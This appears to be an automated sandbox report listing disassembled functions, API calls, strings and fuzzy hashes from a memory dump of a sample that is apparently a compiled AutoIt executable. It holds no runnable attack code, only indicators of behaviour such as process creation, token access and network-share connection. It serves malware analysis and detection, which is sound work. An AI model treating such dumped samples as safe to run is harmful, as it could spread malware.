Opcode Fuzzy Hash: f029110d3c54b2edb63612ed6cfcd1ef549b75b1c8e965e5bb0225e4e247f9f3
Instruction Fuzzy Hash: A1115E36900109AFCB04FBA4DD46DAEB7B8AF05311B1441A6F505A72A1EB31AE04DB61

Function 00C28B41 Relevance: 6.1, APIs: 4, Instructions: 59windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,000000B0,?,?), ref: 00C28B61
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00C28B73
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00C28B89
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00C28BA4

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 929ec903cf6d079ad78b19d387cced237cef73b569339fb97c8e0f93da55c6d4
Instruction ID: 3c88f28fcca0ff7a4648bdc2bdd3ffb2d62181bad41f60c80946c3907d870a77
Opcode Fuzzy Hash: 929ec903cf6d079ad78b19d387cced237cef73b569339fb97c8e0f93da55c6d4
Instruction Fuzzy Hash: 55115E79901218FFDB10DF95CC84F9DBBB4FB48710F204095E900B7250DA716E11DB94

Function 00BD1290 Relevance: 6.1, APIs: 4, Instructions: 59COMMON

Download Yara Rule

APIs

Part of subcall function 00BD2612: GetWindowLongW.USER32(?,000000EB), ref: 00BD2623

DefDlgProcW.USER32(?,00000020,?), ref: 00BD12D8
GetClientRect.USER32(?,?), ref: 00C0B5FB
GetCursorPos.USER32(?), ref: 00C0B605
ScreenToClient.USER32(?,?), ref: 00C0B610

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: Client$CursorLongProcRectScreenWindow
String ID:
API String ID: 4127811313-0
Opcode ID: f8a9e395f10df0e437df4d236129ccd6736dea16d1ce380880069bbb0c944d46
Instruction ID: add0474b44a1928840ceec3b73097e39f0233099752ea27ac6341ab6c1c8a025
Opcode Fuzzy Hash: f8a9e395f10df0e437df4d236129ccd6736dea16d1ce380880069bbb0c944d46
Instruction Fuzzy Hash: E2113D39500119FFCB04DF98D889AEEB7F9FB05301F500896F901E7240E731BA918BA5

Function 00C31142 Relevance: 6.1, APIs: 4, Instructions: 51sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00C2FCED,?,00C30D40,?,00008000), ref: 00C3115F
Sleep.KERNEL32(00000000,?,?,?,?,?,?,00C2FCED,?,00C30D40,?,00008000), ref: 00C31184
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00C2FCED,?,00C30D40,?,00008000), ref: 00C3118E
Sleep.KERNEL32(?,?,?,?,?,?,?,00C2FCED,?,00C30D40,?,00008000), ref: 00C311C1

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: CounterPerformanceQuerySleep
String ID:
API String ID: 2875609808-0
Opcode ID: 8600714c1539a5f6a7e05d86f4b032cd7a93e27e0dc2a195ab22cbcbc9837295
Instruction ID: f654f859bec29f16662948a2b19912f55e8f01d17aeb5753d954e022409cd4bf
Opcode Fuzzy Hash: 8600714c1539a5f6a7e05d86f4b032cd7a93e27e0dc2a195ab22cbcbc9837295
Instruction Fuzzy Hash: 4B113C35D11A1DDBCF04AFA5D888BEEBBB8FF09711F044059EE41B2240CB709691CB95

Function 00C2D831 Relevance: 6.0, APIs: 4, Instructions: 50registryCOMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 00C2D84D
LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 00C2D864
RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 00C2D879
RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 00C2D897

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: Type$Register$FileLoadModuleNameUser
String ID:
API String ID: 1352324309-0
Opcode ID: 2d37d6952063b5e7238980dec8b98b93534c819ada61586800c9e0be75b90145
Instruction ID: b157540fa442326f6b0f4eb6dfa6c80de3020f04405609db00f82762fca17143
Opcode Fuzzy Hash: 2d37d6952063b5e7238980dec8b98b93534c819ada61586800c9e0be75b90145
Instruction Fuzzy Hash: E4115E75605324DBE3248F51FC08F97BBBCEB00B00F10856DA656D6890D7B0E589DBE1

Function 00C06FB7 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftof_l.LIBCMT ref: 00C06FDB

Part of subcall function 00C076C2: __fltout2.LIBCMT ref: 00C076EB

__cftog_l.LIBCMT ref: 00C07001
__cftoe_l.LIBCMT ref: 00C07033

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
Instruction ID: 50c28faeb2803de36000feef252173e102692b0bf27c3917eb87df371b5f1ea0
Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
Instruction Fuzzy Hash: 5201407284814EBBCF1A5F84CC45CED3F66BB18354F588615FE28580B1D236EAB1EB81

Function 00C5B2C5 Relevance: 6.0, APIs: 4, Instructions: 47COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 00C5B2E4
ScreenToClient.USER32(?,?), ref: 00C5B2FC
ScreenToClient.USER32(?,?), ref: 00C5B320
InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00C5B33B

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: ClientRectScreen$InvalidateWindow
String ID:
API String ID: 357397906-0
Opcode ID: 3351577e91271f490b1317956f193238627b9c9818a688d34c9fca8ad90508bb
Instruction ID: ed7223d3aae60868f5bca003c5589e0aebb73ffb14e0c679e9ae12acb57aa94d
Opcode Fuzzy Hash: 3351577e91271f490b1317956f193238627b9c9818a688d34c9fca8ad90508bb
Instruction Fuzzy Hash: BC114679D00209EFDB41CF99C444AEEFBB5FB08311F104166E914E3220D735AA558F50

Function 00C5B635 Relevance: 6.0, APIs: 4, Instructions: 40processCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00C5B644
_memset.LIBCMT ref: 00C5B653
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00C96F20,00C96F64), ref: 00C5B682
CloseHandle.KERNEL32 ref: 00C5B694

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: _memset$CloseCreateHandleProcess
String ID:
API String ID: 3277943733-0
Opcode ID: 3e7d3a08cddd10a8ca31f25ab0f9320f75b61ac0d707906901b9c0b2c37aeb22
Instruction ID: 5f5aa9bf40778d42c66c41d466b6964583fe0a44e61ee8b67679e26de48a362b
Opcode Fuzzy Hash: 3e7d3a08cddd10a8ca31f25ab0f9320f75b61ac0d707906901b9c0b2c37aeb22
Instruction Fuzzy Hash: 48F0FEF65403047AF61067A5BC0AFBF7A9CEB09795F004035BA08E61E2D7755C1187A8

Function 00C36BDA Relevance: 6.0, APIs: 4, Instructions: 33COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?), ref: 00C36BE6

Part of subcall function 00C376C4: _memset.LIBCMT ref: 00C376F9

_memmove.LIBCMT ref: 00C36C09
_memset.LIBCMT ref: 00C36C16
LeaveCriticalSection.KERNEL32(?), ref: 00C36C26

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: CriticalSection_memset$EnterLeave_memmove
String ID:
API String ID: 48991266-0
Opcode ID: 6d1d4909d257b43a890b0583550a8b7dcdac7350db26f69a275d48f55d3157d2
Instruction ID: 47810b2c0f16c22f4d0c600c3568ef5a2ccd2647b4c5877590f84f8a08ab3ceb
Opcode Fuzzy Hash: 6d1d4909d257b43a890b0583550a8b7dcdac7350db26f69a275d48f55d3157d2
Instruction Fuzzy Hash: 5AF05E7E200204ABCF056F55DC85B8ABB6AEF45361F0480A5FE096F227CB31E855DBB4

Function 00BD2218 Relevance: 6.0, APIs: 4, Instructions: 23COMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000008), ref: 00BD2231
SetTextColor.GDI32(?,000000FF), ref: 00BD223B
SetBkMode.GDI32(?,00000001), ref: 00BD2250
GetStockObject.GDI32(00000005), ref: 00BD2258
GetWindowDC.USER32(?,00000000), ref: 00C0BE83
GetPixel.GDI32(00000000,00000000,00000000), ref: 00C0BE90
GetPixel.GDI32(00000000,?,00000000), ref: 00C0BEA9
GetPixel.GDI32(00000000,00000000,?), ref: 00C0BEC2
GetPixel.GDI32(00000000,?,?), ref: 00C0BEE2
ReleaseDC.USER32(?,00000000), ref: 00C0BEED

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
String ID:
API String ID: 1946975507-0
Opcode ID: af3a5c5acff1a32aa38fddddb25a4fdc3b1e1eefeba7a803a7a33b86a3321bf1
Instruction ID: 4bf4bbcc493637601cf5b1c6ec77d34aaf5c6cb322684c3e73d5f827a595dc5e
Opcode Fuzzy Hash: af3a5c5acff1a32aa38fddddb25a4fdc3b1e1eefeba7a803a7a33b86a3321bf1
Instruction Fuzzy Hash: 27E03936104644AADB255FA4EC0DBDD7B20EB15332F00836AFA79680E197B14AC1DB12

Function 00C28712 Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMON

Download Yara Rule

APIs

GetCurrentThread.KERNEL32 ref: 00C2871B
OpenThreadToken.ADVAPI32(00000000,?,?,?,00C282E6), ref: 00C28722
GetCurrentProcess.KERNEL32(00000028,?,?,?,?,00C282E6), ref: 00C2872F
OpenProcessToken.ADVAPI32(00000000,?,?,?,00C282E6), ref: 00C28736

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: CurrentOpenProcessThreadToken
String ID:
API String ID: 3974789173-0
Opcode ID: 55482ed005102e359dda0a2ea0d335378c97050bc829a712d147200ad98c38b3
Instruction ID: 8d3b1a1d4ae171b47057f47b0827031b5a9d0c10d02dadb68b3a89f673beced3
Opcode Fuzzy Hash: 55482ed005102e359dda0a2ea0d335378c97050bc829a712d147200ad98c38b3
Instruction Fuzzy Hash: C3E0867A6123219BD7605FB06D0CB5F3BBCEF60B93F14482CB245EA0D1DA748486C750

Function 00C2B2F3 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 241comCOMMON

Download Yara Rule

APIs

OleSetContainedObject.OLE32(?,00000001), ref: 00C2B4BE

Strings

AutoIt3GUI, xrefs: 00C2B436
Container, xrefs: 00C2B43B

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: ContainedObject
String ID: AutoIt3GUI$Container
API String ID: 3565006973-3941886329
Opcode ID: 5e78c89663030aa813230c5509074f54ae1ca58200945700f633a7f21ada99b5
Instruction ID: de457df11e4eb20f3e5fee0592536fb4f9080fbc989dc5a9ef94a0372cb24185
Opcode Fuzzy Hash: 5e78c89663030aa813230c5509074f54ae1ca58200945700f633a7f21ada99b5
Instruction Fuzzy Hash: 369158B0600611AFDB14DF68D884B6ABBE5FF49710F20856DF94ACB6A1EB70ED41CB50

Function 00C3AFAC Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 201shareCOMMON

Download Yara Rule

APIs

Part of subcall function 00BEFC86: _wcscpy.LIBCMT ref: 00BEFCA9

Part of subcall function 00BD9837: __itow.LIBCMT ref: 00BD9862
Part of subcall function 00BD9837: __swprintf.LIBCMT ref: 00BD98AC

__wcsnicmp.LIBCMT ref: 00C3B02D
WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 00C3B0F6

Strings

LPT, xrefs: 00C3B027

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
String ID: LPT
API String ID: 3222508074-1350329615
Opcode ID: 4d66521ad020cdbe2b469564cd5c8533dec181648642c0898577678955b0ffaf
Instruction ID: dcc719f7381bedb1b2fa28538557e99fee5904437447088703e53f28a281f9d5
Opcode Fuzzy Hash: 4d66521ad020cdbe2b469564cd5c8533dec181648642c0898577678955b0ffaf
Instruction Fuzzy Hash: 8B615075E10219AFCB18DF94D891EAEB7F4EF08710F1440AAFA16AB391D770AE44CB50

Function 00BE2957 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000000), ref: 00BE2968
GlobalMemoryStatusEx.KERNEL32(?), ref: 00BE2981

Strings

@, xrefs: 00BE2975

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: GlobalMemorySleepStatus
String ID: @
API String ID: 2783356886-2766056989
Opcode ID: c41db83342f3c9ebf7e19c22d69f02f03215f1073d5361443bee47de80918ec3
Instruction ID: 1e1a3173ecaeb14117e4dd5bb2e37cc5b8ab3b3d2b4990c242e1b627762ba1d0
Opcode Fuzzy Hash: c41db83342f3c9ebf7e19c22d69f02f03215f1073d5361443bee47de80918ec3
Instruction Fuzzy Hash: 945137714187449BD320EF10D886BAFFBE8FB85344F41889EF2D8411A1EB318569CB66

Function 00C39734 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 138COMMON

Download Yara Rule

APIs

Part of subcall function 00BD4F0B: __fread_nolock.LIBCMT ref: 00BD4F29

_wcscmp.LIBCMT ref: 00C39824
_wcscmp.LIBCMT ref: 00C39837

Strings

FILE, xrefs: 00C39770

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: _wcscmp$__fread_nolock
String ID: FILE
API String ID: 4029003684-3121273764
Opcode ID: dd8766ede31284ed1c7110c83027c3cd779d5ac0ae85354e4586579d1b41758b
Instruction ID: 3ee9bbc12ead106a00eea65efc95438b5b2b383aa08ed72481695c42dfb9dab2
Opcode Fuzzy Hash: dd8766ede31284ed1c7110c83027c3cd779d5ac0ae85354e4586579d1b41758b
Instruction Fuzzy Hash: C9419571A10219BBDF219BA4CC45FEFBBF9DF85710F0004BAF904A7291DBB19A058B61

Function 00C4258E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97networkCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00C4259E
InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 00C425D4

Strings

|, xrefs: 00C425A5

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: CrackInternet_memset
String ID: |
API String ID: 1413715105-2343686810
Opcode ID: 4840cb4aea6db2e52800c349553f58877831a4185b7f4fe32b3e69c143e28c11
Instruction ID: 8154e1920d78c32fe2facf0aab9f9e537f13523354af1d07301f1a2b140c9cd1
Opcode Fuzzy Hash: 4840cb4aea6db2e52800c349553f58877831a4185b7f4fe32b3e69c143e28c11
Instruction Fuzzy Hash: 76311D71801119EBCF11EFA5CC85EEEBFB9FF08354F10005AF915A6262EB315955DB60

Function 00C57A71 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001132,00000000,?), ref: 00C57B61
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00C57B76

Strings

', xrefs: 00C57ACA

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: MessageSend
String ID: '
API String ID: 3850602802-1997036262
Opcode ID: fac8679242aa12796c33903d5d6aa4d8d735bcdc2bf83a9c4496230b9512ba69
Instruction ID: df12eda6e51246cc37712ccb1c0b8a6bcce2ff7fe4f4b023eec3cc76f2b25fcd
Opcode Fuzzy Hash: fac8679242aa12796c33903d5d6aa4d8d735bcdc2bf83a9c4496230b9512ba69
Instruction Fuzzy Hash: EF412878A043099FDB14CF65D980BDEBBB5FB08301F10026AED04AB381D730AA95DF94

Function 00C56A63 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?,?,?), ref: 00C56B17
MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00C56B53

Strings

static, xrefs: 00C56AB3

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: Window$DestroyMove
String ID: static
API String ID: 2139405536-2160076837
Opcode ID: b63b10797017486249891bb4d1b3f7c82813cad5ba49d0d0a25328739a28432c
Instruction ID: f7e49c83107018a763173920a21a90874304a2e6c2fd9e1a43ed6dfeaba540f8
Opcode Fuzzy Hash: b63b10797017486249891bb4d1b3f7c82813cad5ba49d0d0a25328739a28432c
Instruction Fuzzy Hash: 6531AD75200604AEDB109F68CC80BFB77A9FF48761F50862AF9A5D3190EB31AC85DB64

Function 00C328A2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 88windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00C32911
GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00C3294C

Strings

0, xrefs: 00C3290A

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

